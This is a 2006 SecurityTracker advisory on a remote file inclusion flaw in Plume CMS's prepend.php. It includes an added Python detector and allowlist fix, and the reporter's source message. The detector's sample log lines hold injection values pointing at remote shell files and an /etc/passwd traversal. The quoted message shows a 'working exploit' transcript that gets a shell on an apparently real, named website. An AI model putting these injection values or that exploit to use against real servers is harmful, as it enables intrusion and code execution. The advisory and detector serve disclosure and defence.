SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   Plume CMS
Vendors:   plume-cms.net
Plume CMS Include File Error in 'prepend.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1015624
SecurityTracker URL:  http://securitytracker.com/id/1015624
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 14 2006
Impact:   Execution of arbitrary code via network, User access via network


Description:   unitedbr of Untruth Labs reported a vulnerability in Plume CMS. A remote user can execute arbitrary commands on the target system.

The 'prepend.php' script does not validate the 'manager_path' value before using it as the directory prefix in two include_once() calls ('<manager_path>/conf/config.php' and '<manager_path>/inc/lib.text.php'). A remote user who can set this value through a specially crafted URL can point it at a web server under their control, causing the target system to fetch and execute arbitrary PHP code from that remote location (this requires PHP to be permitted to open URLs, i.e. allow_url_fopen enabled, which was the default configuration at the time). The PHP code, including operating system commands, will run with the privileges of the target web service.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.plume-cms.net/
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
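The description above explains the flaw (an unvalidated 'manager_path' directory prefix fed to include_once()), and the solution field records that no fix was available. The following is an added example, not Plume CMS code and not from the reporter: it scans Apache access-log lines for 'manager_path' values that point at a URL wrapper or traverse the filesystem, and shows the allowlist check a patched prepend.php would need before its include_once() calls. It assumes the value arrives in the query string either as 'manager_path' or as a register_globals-style '_PX_config[manager_path]' (the latter name form is an assumption); every IP address, hostname and log line is constructed.

```python
"""Added example (not Plume CMS code): find 'manager_path' include-injection
attempts in Apache access logs, and show the allowlist check a fixed
prepend.php would need before its include_once() calls.

Assumptions: the vulnerable value arrives in the query string either as
'manager_path' or as the register_globals-style '_PX_config[manager_path]';
all IPs, hosts and log lines below are constructed."""
import os
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Prefixes PHP's include() resolves through a URL/stream wrapper instead of
# the local filesystem (remote fetch needs allow_url_fopen / allow_url_include).
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")

# Apache combined log format: client, identity, user, [time], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: two remote-include attempts (one URL-encoded),
# one benign request, one traversal attempt with a trailing null byte.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Feb/2006:10:01:12 +0100] "GET /prepend.php?_PX_config[manager_path]=http://198.51.100.9/shell.txt HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [14/Feb/2006:10:01:30 +0100] "GET /index.php?_PX_config%5Bmanager_path%5D=ftp%3A%2F%2F198.51.100.9%2Fx HTTP/1.0" 200 410 "-" "Mozilla/4.0"
192.0.2.4 - - [14/Feb/2006:10:02:01 +0100] "GET /index.php?page=2 HTTP/1.1" 200 7012 "-" "Mozilla/5.0"
192.0.2.5 - - [14/Feb/2006:10:02:44 +0100] "GET /prepend.php?manager_path=../../../../etc/passwd%00 HTTP/1.1" 200 1 "-" "curl/7.15"
"""


def classify_value(value):
    """Return 'remote include', 'local include / traversal', or None."""
    decoded = unquote(value)  # parse_qsl decoded once; this catches double encoding
    if decoded.lower().startswith(REMOTE_SCHEMES):
        return "remote include"
    if ".." in decoded or "\x00" in decoded:
        return "local include / traversal"
    return None


def detect_rfi(log_text):
    """Scan access-log text; return one finding per suspicious manager_path value."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            # matches both 'manager_path' and '_PX_config[manager_path]'
            if "manager_path" not in name:
                continue
            kind = classify_value(value)
            if kind is None:
                continue
            findings.append({
                "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                "param": name, "value": unquote(value), "kind": kind,
            })
    return findings


def resolve_manager_path(candidate, allowed_root):
    """Allowlist check for a fix: the manager directory must be a plain path that
    resolves (symlinks included) to allowed_root or somewhere beneath it.
    Returns the resolved absolute path, or None if the value must be rejected."""
    if "\x00" in candidate or candidate.lower().startswith(REMOTE_SCHEMES):
        return None
    root = os.path.realpath(allowed_root)
    # os.path.join discards root if candidate is absolute, so '/etc' is caught too
    resolved = os.path.realpath(os.path.join(root, candidate))
    if resolved != root and not resolved.startswith(root + os.sep):
        return None
    return resolved


if __name__ == "__main__":
    for f in detect_rfi(SAMPLE_LOG):
        print(f"{f['ip']} {f['kind']}: {f['param']}={f['value']!r} (HTTP {f['status']})")
    print(resolve_manager_path("manager", "/var/www/plume"))
    print(resolve_manager_path("http://198.51.100.9/shell.txt", "/var/www/plume"))
```

The detector reports the HTTP status alongside each hit because a 200 on a remote-include request is the signal that the fetch likely succeeded; a 500 or a request rejected by the web server is an attempt, not a compromise. The resolve check is the shape of fix the advisory lacks: it rejects URL wrappers and null bytes outright and then confines the resolved directory to a configured root, which is the property the two include_once() calls need.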

Message History:   None.


 Source Message Contents

Subject:  Plume CMS bug and exploit


/*
                  ____   ____    __
|    |     |     |    | |    |  /
|    |     |     |    | |___/   \
|    | --- |     |----| |   \    \
|____|     |____ |    | |____| __/
 
Copyright (C) 2006 Untruth Labs

Plume CMS remote file inclusion
bug found by unitedbr

remote: yes
vendor: www.plume-cms.net
exploitation: the user can inject remote bad PHP code

file prepend.php, lines 38 and 39:

include_once $_PX_config['manager_path'].'/conf/config.php';
include_once $_PX_config['manager_path'].'/inc/lib.text.php';


Working exploit:

$ java plume1 www.airedebussac.org /

 -===========================-
 -=  Untruth Labs presents  =-
 -=                         =-
 -=    PLUME CMS EXPLOIT    =-
 -=                         =-
 -=          by unitedbr    =-
 -===========================-

bash-2.05$ id
id
uid=55012(airedebu) gid=100(users) groups=99(nobody)

bash-2.05$ uname -a
uname -a
Linux web118.60gp.ha.ovh.net 2.4.31-mutu-hidden #1 SMP Tue Oct 11 11:51:39 CEST 2005 i686 unknown

bash-2.05$ pwd
pwd
/home.2/airedebu/www

bash-2.05$ exit
exit

$
 
*/


Content-Type: application/octet-stream; name="plume1.java"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="plume1.java"

Copyright 2019, SecurityGlobal.net LLC